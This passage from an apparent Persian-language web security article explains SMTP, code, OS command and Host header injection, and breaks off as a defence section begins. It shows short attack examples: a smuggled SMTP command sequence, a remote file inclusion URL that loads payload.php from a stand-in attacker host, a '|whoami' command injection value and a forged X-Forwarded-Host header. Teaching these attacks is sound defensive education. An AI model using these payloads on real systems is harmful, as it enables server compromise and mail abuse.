\u0627\u0632 Mail Server \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0646\u0645\u0648\u062f\u0647 \u06cc\u0627 \u0628\u0647 \u0635\u0648\u0631\u062a \u06a9\u0644\u06cc \u0646\u0642\u0637\u0647\u200c\u06cc \u0627\u062c\u0631\u0627\u06cc \u0627\u06cc\u0646 \u062d\u0645\u0644\u0647\u060c \u0645\u0633\u06cc\u0631\u06cc \u0627\u0633\u062a \u06a9\u0647 \u062f\u0631 \u0622\u0646 \u0642\u0627\u0628\u0644\u06cc\u062a \u062a\u0632\u0631\u06cc\u0642 \u062f\u0633\u062a\u0648\u0631\u0627\u062a IMAP\/SMTP \u0628\u0647 Mail Server \u0648\u062c\u0648\u062f \u062f\u0627\u0631\u062f \u0648 \u0628\u0647 \u062f\u0631\u0633\u062a\u06cc \u0627\u0639\u062a\u0628\u0627\u0631\u0633\u0646\u062c\u06cc \u0646\u0645\u06cc\u200c\u0634\u0648\u062f. \u062f\u0631 \u0635\u0648\u0631\u062a \u0627\u062c\u0631\u0627 \u0634\u062f\u0646 \u0627\u06cc\u0646 \u062d\u0645\u0644\u0647\u060c \u0628\u0633\u062a\u0647 \u0628\u0647 \u062a\u0632\u0631\u06cc\u0642 \u0627\u0646\u062c\u0627\u0645 \u0634\u062f\u0647\u060c \u0646\u062a\u0627\u06cc\u062c \u0645\u062e\u062a\u0644\u0641\u06cc \u0631\u0627 \u062f\u0631 \u0628\u0631 \u062e\u0648\u0627\u0647\u062f \u062f\u0627\u0634\u062a. \u0646\u0645\u0648\u0646\u0647 \u0647\u0627\u06cc\u06cc \u0627\u0632 \u0631\u0648\u0634\u200c\u0647\u0627\u06cc \u0627\u06cc\u0646 \u062d\u0645\u0644\u0647 \u0639\u0628\u0627\u0631\u062a\u0646\u062f \u0627\u0632 :<\/p>\n<p>\u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc \u0627\u0632 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627\u06cc \u067e\u0631\u0648\u062a\u06a9\u0644 IMAP\/SMTP<\/p>\n<ul>\n<li>\u062f\u0648\u0631 \u0632\u062f\u0646 \u0645\u062d\u062f\u0648\u062f\u06cc\u062a\u200c\u0647\u0627\u06cc \u0628\u0631\u0646\u0627\u0645\u0647<\/li>\n<li>\u062f\u0648\u0631 \u0632\u062f\u0646 \u062a\u062f\u0627\u0628\u06cc\u0631 \u0627\u0645\u0646\u06cc\u062a\u06cc \u0636\u062f \u0627\u062a\u0648\u0645\u0627\u062a\u06cc\u06a9\u200c\u0633\u0627\u0632\u06cc<\/li>\n<li>\u0627\u0641\u0634\u0627\u0621 \u0627\u0637\u0644\u0627\u0639\u0627\u062a<\/li>\n<li>\u0627\u06cc\u062c\u0627\u062f \u0647\u0631\u0632\u0646\u0627\u0645\u0647<\/li>\n<\/ul>\n<p><img decoding=\"async\" class=\"wp-image-4443 aligncenter\" src=\"https:\/\/www.irandnn.ir\/mag\/wp-content\/uploads\/2021\/10\/ases5clanskw-300x122.png\" alt=\"\" width=\"824\" height=\"335\" srcset=\"https:\/\/www.irandnn.ir\/mag\/wp-content\/uploads\/2021\/10\/ases5clanskw-300x122.png 300w, https:\/\/www.irandnn.ir\/mag\/wp-content\/uploads\/2021\/10\/ases5clanskw.png 650w\" sizes=\"(max-width: 824px) 100vw, 824px\" \/><\/p>\n<p>\u0645\u062b\u0627\u0644:<\/p>\n<p>\u06cc\u06a9 \u0628\u0631\u0646\u0627\u0645\u0647 \u06a9\u0627\u0631\u0628\u0631\u062f\u06cc \u0648\u0628 \u0628\u0627 \u06cc\u06a9 \u0633\u0631\u0648\u06cc\u0633 \u0627\u0631\u0627\u0626\u0647 \u0627\u06cc\u0645\u06cc\u0644 (webmail) \u0631\u0627 \u062a\u0635\u0648\u0631 \u06a9\u0646\u06cc\u062f \u06a9\u0647 \u062f\u0686\u0627\u0631 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc SMTP Injection \u00a0\u0645\u06cc\u200c\u0628\u0627\u0634\u062f. \u0646\u0641\u0648\u0630\u06af\u0631 \u062f\u0631\u062e\u0648\u0627\u0633\u062a\u06cc \u0628\u0627 \u0645\u062a\u062f POST \u0645\u0634\u0627\u0628\u0647 \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u0632\u06cc\u0631 \u0631\u0627 \u0628\u0647 \u0628\u0631\u0646\u0627\u0645\u0647 \u0627\u0631\u0633\u0627\u0644 \u0645\u06cc\u200c\u06a9\u0646\u062f:<\/p>\n<pre>POST http:\/\/&lt;webmail&gt;\/compose.php HTTP\/1.1\u00a0 \r\n\r\n-----------------------------134475172700422922879687252\u00a0 \r\n\r\nContent-Disposition: form-data; name=\"subject\"\u00a0 \r\n\r\nTest\r\n\r\n .\r\n\r\nMAIL FROM: external@domain1.com\u00a0 \r\n\r\nRCPT TO: external@domain1.com\u00a0 \r\n\r\nRCPT TO: external@domain2.com\u00a0 \r\n\r\nRCPT TO: external@domain3.com\u00a0 \r\n\r\nRCPT TO: external@domain4.com\u00a0 \r\n\r\nData\u00a0 \r\n\r\nSMTP Injection attack\u00a0 \r\n\r\n.\u00a0 \r\n\r\n-----------------------------134475172700422922879687252\u00a0 \r\n\r\n...<\/pre>\n<p>\u0647\u0645\u0627\u0646\u0637\u0648\u0631 \u06a9\u0647 \u06af\u0641\u062a\u0647 \u0634\u062f\u060c \u0627\u06cc\u0646 \u0628\u0631\u0646\u0627\u0645\u0647 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631 \u0628\u0648\u062f\u0647 \u0648 \u0627\u06cc\u0646 \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u0631\u0627 \u0628\u0647 \u062f\u0631\u0633\u062a\u06cc \u0627\u0639\u062a\u0628\u0627\u0631\u0633\u0646\u062c\u06cc \u0646\u0645\u06cc\u200c\u0646\u0645\u0627\u06cc\u062f. \u067e\u0633 \u0627\u06cc\u0646 \u062f\u0631\u062e\u0648\u0627\u0633\u062a\u060c \u0645\u0646\u062c\u0631 \u0628\u0647 \u0627\u062c\u0631\u0627 \u0634\u062f\u0646 \u062f\u0633\u062a\u0648\u0631 \u0632\u06cc\u0631 \u062f\u0631 mail Server \u0627\u06cc\u0646 \u0628\u0631\u0646\u0627\u0645\u0647 \u0645\u06cc\u200c\u0634\u0648\u062f:<\/p>\n<pre>MAIL FROM: &lt;mailfrom&gt;\u00a0 \r\n\r\nRCPT TO: &lt;rcptto&gt;\u00a0 \r\n\r\nDATA\u00a0 \r\n\r\nSubject: Test\u00a0 \r\n\r\n.\u00a0 \r\n\r\nMAIL FROM: external@domain.com\u00a0\r\n\r\n RCPT TO: external@domain1.com\u00a0 \r\n\r\nRCPT TO: external@domain2.com\u00a0 \r\n\r\nRCPT TO: external@domain3.com\u00a0 \r\n\r\nRCPT TO: external@domain4.com\u00a0 \r\n\r\nDATA\u00a0 \r\n\r\nSMTP Injection attack\u00a0 \r\n\r\n. \r\n\r\n...<\/pre>\n<p>\u062f\u0631 \u0646\u062a\u06cc\u062c\u0647\u200c\u06cc \u0627\u062c\u0631\u0627 \u0634\u062f\u0646 \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631\u060c \u067e\u06cc\u0627\u0645\u200c\u0647\u0627\u06cc\u06cc \u0628\u0627 \u0645\u062d\u062a\u0648\u0627\u06cc \u062f\u0644\u062e\u0648\u0627\u0647 \u0646\u0641\u0648\u0630\u06af\u0631 \u062f\u0631 \u062f\u0631\u062e\u0648\u0627\u0633\u062a\u060c \u0628\u0627 \u0639\u0628\u0627\u0631\u062a Data \u062c\u0627\u06cc\u06af\u0632\u06cc\u0646 \u0634\u062f\u0647 \u0648 \u0628\u0647 \u0627\u06cc\u0645\u06cc\u0644\u200c\u0647\u0627\u06cc \u0645\u0648\u062c\u0648\u062f \u062f\u0631 \u0648\u0631\u0648\u062f\u06cc\u200c\u0647\u0627\u06cc RCPT TO \u0627\u0631\u0633\u0627\u0644 \u0645\u06cc\u200c\u0634\u0648\u062f. RCPT \u0627\u0634\u0627\u0631\u0647 \u0628\u0647 \u0648\u0627\u0698\u0647 recipient \u062f\u0627\u0631\u062f \u06a9\u0647 \u0628\u0647 \u0645\u0639\u0646\u0627\u06cc \u200c\u06af\u06cc\u0631\u0646\u062f\u0647 \u0627\u0633\u062a.<\/p>\n<h4><strong>\u062d\u0645\u0644\u0647 <\/strong><strong>Code Injection<\/strong><\/h4>\n<p>\u0627\u06cc\u0646 \u062d\u0645\u0644\u0647 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0628\u0647 \u0648\u0627\u0633\u0637\u0647\u200c\u06cc \u06cc\u06a9 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc\u060c \u062f\u0631 \u0646\u0633\u062e\u0647\u200c\u06cc \u0632\u0628\u0627\u0646 \u0645\u0648\u0631\u062f \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u062f\u0631 \u0633\u0645\u062a \u0633\u0631\u0648\u0631\u060c \u0645\u0627\u0646\u0646\u062f PHP\u060cASP \u0648 &#8230; \u06cc\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0645\u0646\u0637\u0642\u06cc \u0646\u0627\u062f\u0631\u0633\u062a \u062f\u0631 \u0628\u0631\u0646\u0627\u0645\u0647 \u0646\u0648\u06cc\u0633\u06cc \u0628\u06a9\u200c\u0627\u0646\u062f\u060c \u0628\u0647 \u0648\u062c\u0648\u062f \u0628\u06cc\u0627\u06cc\u062f. \u0627\u06cc\u0646 \u062d\u0645\u0644\u0647 \u0631\u0627 \u0628\u0627 \u0646\u0627\u0645 Remote Code Execution (\u0627\u062c\u0631\u0627\u06cc \u06a9\u062f \u0627\u0632 \u0631\u0627\u0647 \u062f\u0648\u0631) \u06cc\u0627 \u0628\u0647 \u0637\u0648\u0631 \u0645\u062e\u062a\u0635\u0631 RCE \u0647\u0645 \u0645\u06cc\u200c\u0634\u0646\u0627\u0633\u0646\u062f. \u0627\u062c\u0631\u0627\u06cc \u0645\u0648\u0641\u0642\u06cc\u062a \u0622\u0645\u06cc\u0632 \u0627\u06cc\u0646 \u062d\u0645\u0644\u0647\u060c \u0628\u0647 \u0645\u0639\u0646\u0627\u06cc \u062a\u0632\u0631\u06cc\u0642 \u0634\u062f\u0646 \u06cc\u06a9 \u0642\u0637\u0639\u0647 \u06a9\u062f \u0645\u0631\u062a\u0628\u0637 \u0628\u0627 \u0633\u0627\u062e\u062a\u0627\u0631 \u0628\u0631\u0646\u0627\u0645\u0647 \u0648 \u0627\u062c\u0631\u0627 \u0634\u062f\u0646 \u0622\u0646 \u062a\u0648\u0633\u0637 \u0633\u0631\u0648\u0631 \u0627\u0633\u062a \u06a9\u0647 \u0628\u0633\u062a\u0647 \u0628\u0647 \u0645\u06cc\u0632\u0627\u0646 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0628\u0631\u0646\u0627\u0645\u0647 \u062f\u0631 \u0627\u062c\u0631\u0627\u06cc \u06a9\u062f \u0646\u0641\u0648\u0630\u06af\u0631\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u062a\u0628\u0639\u0627\u062a \u0645\u062a\u0641\u0627\u0648\u062a\u06cc \u0631\u0627 \u062f\u0627\u0634\u062a\u0647 \u0628\u0627\u0634\u062f. \u0646\u0641\u0648\u0630\u06af\u0631 \u0628\u0627 \u0627\u062c\u0631\u0627\u06cc \u0627\u06cc\u0646 \u062d\u0645\u0644\u0647\u060c \u0642\u0627\u062f\u0631 \u0627\u0633\u062a \u062d\u0645\u0644\u0627\u062a\u06cc \u062f\u06cc\u06af\u0631 \u0645\u0627\u0646\u0646\u062f Command Injection \u0631\u0627 \u0646\u06cc\u0632 \u067e\u06cc\u0627\u062f\u0647 \u0633\u0627\u0632\u06cc \u06a9\u0646\u062f.<\/p>\n<p><img decoding=\"async\" class=\"wp-image-4444 aligncenter\" src=\"https:\/\/www.irandnn.ir\/mag\/wp-content\/uploads\/2021\/10\/A_Pentester___s_Guide_to_Code_Injection-300x213.png\" alt=\"\" width=\"669\" height=\"475\" srcset=\"https:\/\/www.irandnn.ir\/mag\/wp-content\/uploads\/2021\/10\/A_Pentester___s_Guide_to_Code_Injection-300x213.png 300w, https:\/\/www.irandnn.ir\/mag\/wp-content\/uploads\/2021\/10\/A_Pentester___s_Guide_to_Code_Injection-768x545.png 768w, https:\/\/www.irandnn.ir\/mag\/wp-content\/uploads\/2021\/10\/A_Pentester___s_Guide_to_Code_Injection.png 1000w\" sizes=\"(max-width: 669px) 100vw, 669px\" \/><\/p>\n<p>\u0645\u062b\u0627\u0644:<\/p>\n<p>\u06cc\u06a9 \u0628\u0631\u0646\u0627\u0645\u0647 \u06a9\u0627\u0631\u0628\u0631\u062f\u06cc \u0648\u0628\u060c \u0628\u0631\u0627\u06cc \u0628\u0627\u0631\u06af\u0630\u0627\u0631\u06cc \u06cc\u06a9 \u0635\u0641\u062d\u0647 \u0628\u0627 \u0622\u062f\u0631\u0633 \u0632\u06cc\u0631\u060c \u0627\u0632 \u0639\u0645\u0644\u06a9\u0631\u062f eval() \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u0646\u0645\u0627\u06cc\u062f:<\/p>\n<pre>http:\/\/vulnerable-site.com\/?path=support.php<\/pre>\n<p>\u062d\u0627\u0644 \u0646\u0641\u0648\u0630\u06af\u0631 \u0628\u0631\u0627\u06cc \u0622\u0632\u0645\u0648\u0646 \u0646\u0641\u0648\u0630\u067e\u0630\u06cc\u0631\u06cc \u0627\u06cc\u0646 \u0628\u0631\u0646\u0627\u0645\u0647 \u0628\u0631\u0627\u06cc \u062d\u0645\u0644\u0647\u200c\u06cc RCE\u060c \u0622\u062f\u0631\u0633 \u06cc\u06a9 \u0641\u0627\u06cc\u0644 \u062d\u0627\u0648\u06cc \u06a9\u062f \u0645\u062f\u0646\u0638\u0631\u060c \u062f\u0631 \u0633\u0627\u06cc\u062a \u062e\u0648\u062f \u0631\u0627 \u062f\u0631 \u067e\u0627\u0631\u0627\u0645\u062a\u0631 path\u060c \u0628\u0647 \u0635\u0648\u0631\u062a \u0632\u06cc\u0631 \u062c\u0627\u06af\u0630\u0627\u0631\u06cc \u0645\u06cc\u200c\u0646\u0645\u0627\u06cc\u062f:<\/p>\n<pre>http:\/\/vulnerable-site.com\/?path=http:\/\/attacker-website\/paylaod.php<\/pre>\n<p>\u0628\u0647 \u062f\u0644\u06cc\u0644 \u0627\u06cc\u0646\u06a9\u0647 \u0627\u06cc\u0646 \u0628\u0631\u0646\u0627\u0645\u0647 \u0627\u0639\u062a\u0628\u0627\u0631 \u0633\u0646\u062c\u06cc \u062f\u0631\u0633\u062a\u06cc \u0631\u0648\u06cc \u0627\u06cc\u0646 \u0648\u0631\u0648\u062f\u06cc \u0627\u0646\u062c\u0627\u0645 \u0646\u0645\u06cc\u200c\u062f\u0647\u062f\u060c \u0641\u0627\u06cc\u0644 payload.php \u062a\u0648\u0633\u0637 \u0633\u0631\u0648\u0631 \u0633\u0627\u06cc\u062a \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631 \u0627\u062c\u0631\u0627 \u0634\u062f\u0647 \u0648 \u0627\u0632 \u0627\u06cc\u0646 \u0637\u0631\u06cc\u0642\u060c \u0646\u0641\u0648\u0630\u06af\u0631 \u0642\u0627\u062f\u0631 \u0627\u0633\u062a \u062a\u0627 \u062d\u0645\u0644\u0627\u062a\u06cc \u062f\u06cc\u06af\u0631 \u0631\u0627 \u0647\u0645 \u067e\u06cc\u0627\u062f\u0647\u200c\u200c\u0633\u0627\u0632\u06cc \u0646\u0645\u0627\u06cc\u062f.<\/p>\n<h4><strong>\u062d\u0645\u0644\u0647 <\/strong><strong>Command Injection<\/strong><\/h4>\n<p>\u0628\u0647 \u0627\u06cc\u0646 \u062d\u0645\u0644\u0647 \u0628\u0647 \u0637\u0648\u0631 \u06a9\u0627\u0645\u0644\u200c\u062a\u0631\u060c OS Command Injection \u0646\u06cc\u0632 \u06af\u0641\u062a\u0647 \u0645\u06cc\u200c\u0634\u0648\u062f \u06a9\u0647 \u0628\u0647 \u0645\u0639\u0646\u0627\u06cc \u062a\u0632\u0631\u06cc\u0642 \u0641\u0631\u0645\u0627\u0646 \u0633\u06cc\u0633\u062a\u0645 \u0639\u0627\u0645\u0644 \u0627\u0633\u062a. \u0627\u06cc\u0646 \u062d\u0645\u0644\u0647 \u0632\u0645\u0627\u0646\u06cc\u200c \u0631\u062e \u0645\u06cc\u200c\u062f\u0647\u062f \u06a9\u0647 \u0646\u0641\u0648\u0630\u06af\u0631\u060c \u062f\u0633\u062a\u0648\u0631\u0627\u062a \u062e\u0637 \u0641\u0631\u0645\u0627\u0646(\u0648\u06cc\u0646\u062f\u0648\u0632\u06cc \u06cc\u0627 \u06cc\u0648\u0646\u06cc\u06a9\u0633\u06cc) \u0631\u0627\u060c \u0628\u0647 \u0646\u0642\u0637\u0647\u200c\u200c\u0627\u06cc \u0627\u0632 \u0628\u0631\u0646\u0627\u0645\u0647 \u06a9\u0647 \u0627\u0639\u062a\u0628\u0627\u0631\u0633\u0646\u062c\u06cc \u062f\u0631\u0633\u062a\u06cc \u0628\u0631 \u0622\u0646 \u0627\u0646\u062c\u0627\u0645 \u0646\u0634\u062f\u0647 \u0627\u0633\u062a\u060c \u062a\u0632\u0631\u06cc\u0642 \u0646\u0645\u0648\u062f\u0647 \u0648 \u0648\u0628\u200c\u0633\u0631\u0648\u0631 \u0628\u0631\u0646\u0627\u0645\u0647\u060c \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631 \u0631\u0627 \u0627\u062c\u0631\u0627 \u06a9\u0646\u062f. \u062f\u0631 \u0635\u0648\u0631\u062a\u06cc \u06a9\u0647 \u0646\u0641\u0648\u0630\u06af\u0631\u060c \u0642\u0627\u0628\u0644\u06cc\u062a \u0627\u062c\u0631\u0627\u06cc \u0641\u0631\u0645\u0627\u0646 \u0631\u0627 \u062f\u0627\u0634\u062a\u0647 \u0628\u0627\u0634\u062f\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0628\u0647 \u0631\u0627\u062d\u062a\u06cc \u0627\u0642\u062f\u0627\u0645 \u0628\u0647 \u0633\u0631\u0642\u062a \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u06cc\u0627 \u0646\u0635\u0628 \u06cc\u06a9 \u0628\u0631\u0646\u0627\u0645\u0647 \u0645\u062e\u0631\u0628 \u0628\u0646\u0645\u0627\u06cc\u062f \u06a9\u0647 \u0627\u06cc\u0646 \u0627\u0645\u0631 \u0645\u06cc\u062a\u0648\u0627\u0646\u062f \u0645\u0646\u062c\u0631 \u0628\u0647 \u0628\u0627\u0644\u0627 \u0631\u0641\u062a\u0646 \u0634\u062f\u062a \u062d\u0645\u0644\u0647 \u0634\u0648\u062f.<\/p>\n<p>\u0627\u06cc\u0646 \u062d\u0645\u0644\u0647 \u0627\u0632 \u0637\u0631\u06cc\u0642 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627\u06cc \u062f\u06cc\u06af\u0631\u060c \u0645\u0627\u0646\u0646\u062f \u0645\u0648\u0627\u0631\u062f \u0632\u06cc\u0631 \u0647\u0645 \u0642\u0627\u0628\u0644 \u0627\u062c\u0631\u0627 \u0645\u06cc\u200c\u0628\u0627\u0634\u062f:<\/p>\n<ul>\n<li><strong>Insecure Deserialization<\/strong><\/li>\n<li><strong>XML Injection<\/strong><\/li>\n<li><strong>File Inclution\/Upload<\/strong><\/li>\n<\/ul>\n<p>\u0645\u062b\u0627\u0644:<\/p>\n<p>\u06cc\u06a9 \u0628\u0631\u0646\u0627\u0645\u0647 \u06a9\u0627\u0631\u0628\u0631\u062f\u06cc \u0648\u0628\u060c \u0635\u0641\u062d\u0627\u062a \u062e\u0648\u062f \u0631\u0627 \u0628\u0627 \u067e\u0627\u0631\u0627\u0645\u062a\u0631 param \u0645\u0634\u0627\u0628\u0647 \u0622\u062f\u0631\u0633 \u0632\u06cc\u0631\u060c \u0628\u0627\u0631\u06af\u0630\u0627\u0631\u06cc \u0645\u06cc\u200c\u0646\u0645\u0627\u06cc\u062f:<\/p>\n<pre>https:\/\/vulnerable-website\/endpoint?param=1<\/pre>\n<p>\u062d\u0627\u0644\u060c \u0646\u0641\u0648\u0630\u06af\u0631 \u0628\u0631\u0627\u06cc \u0627\u0637\u0644\u0627\u0639 \u0627\u0632 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631 \u0628\u0648\u062f\u0646 \u0628\u0631\u0646\u0627\u0645\u0647 \u0628\u0647 \u062d\u0645\u0644\u0647\u200c\u06cc Command Injection\u060c \u0641\u0631\u0645\u0627\u0646 whoami \u0631\u0627 \u0628\u0647 \u0634\u06a9\u0644 \u0632\u06cc\u0631 \u0628\u0647 \u0628\u0631\u0646\u0627\u0645\u0647 \u062a\u0632\u0631\u06cc\u0642 \u0645\u06cc\u200c\u0646\u0645\u0627\u06cc\u062f:<\/p>\n<pre>https:\/\/vulnerable-website\/endpoint?param=1|whoami<\/pre>\n<p>\u0628\u0647 \u062f\u0644\u06cc\u0644 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631 \u0628\u0648\u062f\u0646 \u0628\u0631\u0646\u0627\u0645\u0647\u060c \u0641\u0631\u0645\u0627\u0646 \u0646\u0641\u0648\u0630\u06af\u0631 \u062f\u0631 \u0633\u0631\u0648\u0631 \u0627\u062c\u0631\u0627 \u0634\u062f\u0647 \u0646\u062a\u06cc\u062c\u0647 \u0628\u0631 \u0631\u0648\u06cc \u0645\u0631\u0648\u0631\u06af\u0631 \u0638\u0627\u0647\u0631 \u0645\u06cc\u200c\u0634\u0648\u062f. \u062d\u0627\u0644 \u0627\u0648 \u0642\u0627\u062f\u0631 \u0627\u0633\u062a \u06a9\u0647 \u0628\u0627 \u06af\u0633\u062a\u0631\u0634 \u0627\u06cc\u0646 \u062d\u0645\u0644\u0647\u060c \u0622\u0633\u06cc\u0628\u200c\u0647\u0627\u06cc \u0628\u06cc\u0634\u062a\u0631\u06cc \u0628\u0647 \u0633\u0631\u0648\u0631 \u0628\u0631\u0646\u0627\u0645\u0647 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631 \u0648\u0627\u0631\u062f \u06a9\u0646\u062f.<\/p>\n<h4><strong>\u062d\u0645\u0644\u0647 Host Header Injection<\/strong><\/h4>\n<p>Header \u06cc\u0627 \u0633\u0631\u0628\u0631\u06af Host\u060c \u0627\u0632 \u067e\u0627\u0631\u0627\u0645\u062a\u0631\u200c\u0647\u0627\u06cc\u06cc \u0627\u0633\u062a \u06a9\u0647 \u062f\u0631 \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u0647\u0627\u06cc \u06a9\u0627\u0631\u0628\u0631\u060c \u0628\u0647 \u0633\u0645\u062a \u0633\u0631\u0648\u0631 \u0628\u0631\u0646\u0627\u0645\u0647\u200c\u0647\u0627\u06cc \u0648\u0628\u060c \u0627\u0631\u0633\u0627\u0644 \u0645\u06cc\u200c\u0634\u0648\u062f \u0648 \u062a\u0639\u06cc\u06cc\u0646 \u06a9\u0646\u0646\u062f\u0647\u200c\u06cc Host \u06cc\u0627 \u0645\u06cc\u0632\u0628\u0627\u0646 \u0628\u0631\u0646\u0627\u0645\u0647 \u0648\u0628 \u06af\u0641\u062a\u0647 \u0634\u062f\u0647\u060c \u0645\u06cc\u200c\u0628\u0627\u0634\u062f. \u0628\u0647 \u062f\u0644\u06cc\u0644 \u0627\u06cc\u0646\u06a9\u0647 Host\u060c \u0627\u0632 \u0633\u0631\u0628\u0631\u06af \u0647\u0627\u06cc \u062f\u0631\u062e\u0648\u0627\u0633\u062a\u200c\u0647\u0627\u06cc Http \u0645\u06cc\u200c\u0628\u0627\u0634\u062f\u060c \u0645\u0634\u0627\u0647\u062f\u0647 \u0648 \u0627\u06cc\u062c\u0627\u062f \u062a\u063a\u06cc\u06cc\u0631 \u062f\u0631 \u0622\u0646\u060c \u0646\u06cc\u0627\u0632\u0645\u0646\u062f \u067e\u0631\u0648\u06a9\u0633\u06cc \u062f\u0627\u062e\u0644\u06cc \u0648 \u0631\u0647\u06af\u06cc\u0631\u06cc \u062f\u0631\u062e\u0648\u0627\u0633\u062a\u200c\u0647\u0627\u06cc \u0645\u0631\u0648\u0631\u06af\u0631 \u0645\u06cc\u200c\u0628\u0627\u0634\u062f. \u062f\u0631 \u0627\u06cc\u0646 \u062d\u0645\u0644\u0647\u060c \u0646\u0641\u0648\u0630\u06af\u0631 \u0628\u0627 \u0627\u06cc\u062c\u0627\u062f \u062a\u063a\u06cc\u06cc\u0631 \u062f\u0631 \u0648\u0631\u0648\u062f\u06cc \u0627\u06cc\u0646 \u0647\u062f\u0631 \u06cc\u0627 \u0647\u062f\u0631\u0647\u0627\u06cc \u0645\u0631\u062a\u0628\u0637 \u0628\u0627 \u0622\u0646 \u0645\u0627\u0646\u0646\u062f X-Forwaded-Host\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0628\u0627\u0639\u062b \u0627\u06cc\u062c\u0627\u062f \u062d\u0645\u0644\u0627\u062a\u06cc \u0627\u0632 \u062c\u0645\u0644\u0647 \u062d\u0645\u0644\u0627\u062a \u0632\u06cc\u0631 \u0634\u0648\u062f:<\/p>\n<ul>\n<li>\u0622\u0644\u0648\u062f\u0647 \u06a9\u0631\u062f\u0646 \u06a9\u0634 \u0648\u0628 (Web Cache Poisoning)<\/li>\n<li>\u0645\u0633\u0645\u0648\u0645\u200c\u0633\u0627\u0632\u06cc \u062a\u063a\u06cc\u06cc\u0631 \u0631\u0645\u0632\u200c\u0639\u0628\u0648\u0631 (Password Reset Poisoning)<\/li>\n<li>\u062c\u0639\u0644 \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u0633\u0645\u062a \u0633\u0631\u0648\u0631 (SSRF)<\/li>\n<li>\u062f\u0648\u0631 \u0632\u062f\u0646 \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a<\/li>\n<\/ul>\n<p>\u0645\u062b\u0627\u0644:<\/p>\n<p>\u06cc\u06a9 \u0628\u0631\u0646\u0627\u0645\u0647 \u06a9\u0627\u0631\u0628\u0631\u062f\u06cc \u0648\u0628\u060c \u0627\u0639\u062a\u0628\u0627\u0631 \u0633\u0646\u062c\u06cc \u062f\u0631\u0633\u062a\u06cc \u0631\u0648\u06cc \u0648\u0631\u0648\u062f\u06cc\u200c\u0647\u0627\u06cc \u0642\u0627\u0628\u0644 \u062f\u0633\u062a\u0631\u0633\u06cc \u06a9\u0627\u0631\u0628\u0631 \u0627\u0646\u062c\u0627\u0645 \u0646\u0645\u06cc\u200c\u062f\u0647\u062f. \u06cc\u06a9 \u0646\u0641\u0648\u0630\u06af\u0631 \u0628\u0631\u0627\u06cc \u0627\u062c\u0631\u0627\u0621 \u062d\u0645\u0644\u0647\u200c\u06cc Host Header Injection\u060c \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u0632\u06cc\u0631 \u0631\u0627 \u0628\u0647 \u0628\u0631\u0646\u0627\u0645\u0647 \u0627\u0631\u0633\u0627\u0644 \u0645\u06cc\u200c\u0646\u0645\u0627\u06cc\u062f:<\/p>\n<pre>GET \/ HTTP\/1.1\r\nHost: www.example.com\r\n<strong>X-Forwarded-Host<\/strong><strong>: <\/strong><strong>www.attacker.com<\/strong><\/pre>\n<p>\u0628\u0639\u062f \u0627\u0632 \u0627\u0631\u0633\u0627\u0644 \u0634\u062f\u0646 \u0627\u06cc\u0646 \u062f\u0631\u062e\u0648\u0627\u0633\u062a\u060c \u0633\u0627\u06cc\u062a \u0646\u0641\u0648\u0630\u06af\u0631 \u062a\u0648\u0633\u0637 \u062f\u0631\u06cc\u0627\u0641\u062a \u067e\u06cc\u063a\u0627\u0645 Redirect \u062f\u0631 \u0645\u0631\u0648\u0631\u06af\u0631 \u0648\u06cc \u0646\u0645\u0627\u06cc\u0634 \u062f\u0627\u062f\u0647 \u0645\u06cc\u200c\u0634\u0648\u062f. \u067e\u0633 \u062f\u0631 \u0646\u062a\u06cc\u062c\u0647 \u0627\u0648 \u0645\u062a\u0648\u062c\u0647 \u0648\u062c\u0648\u062f \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u062f\u0631 \u0633\u0627\u06cc\u062a \u0642\u0631\u0628\u0627\u0646\u06cc \u0634\u062f\u0647 \u0648 \u0628\u0647 \u06af\u0633\u062a\u0631\u0634 \u0627\u06cc\u0646 \u062d\u0645\u0644\u0647 \u0645\u06cc\u200c\u067e\u0631\u062f\u0627\u0632\u062f.<\/p>\n<h3><strong>\u0627\u0645\u0646\u200c\u0633\u0627\u0632\u06cc \u062f\u0631 \u0628\u0631\u0627\u0628\u0631 \u062d\u0645\u0644\u0627\u062a \u062a\u0632\u0631\u06cc\u0642 \u0686\u06af\u0648\u0646\u0647 \u0627\u0646\u062c\u0627\u0645 \u0645\u06cc\u200c\u0634\u0648\u062f\u061f<\/strong><\/h3>\n<p>\u0628\u0627 \u0645\u0631\u0648\u0631 \u0645\u062e\u062a\u0635\u0631 \u0627\u0646\u0648\u0627\u0639 \u062d\u0645\u0644\u0627\u062a \u062a\u0632\u0631\u06cc\u0642\u060c \u0645\u062a\u0648\u062c\u0647 \u062f\u0644\u0627\u06cc\u0644\u06cc \u0645\u0634\u0627\u0628\u0647 \u062f\u0631 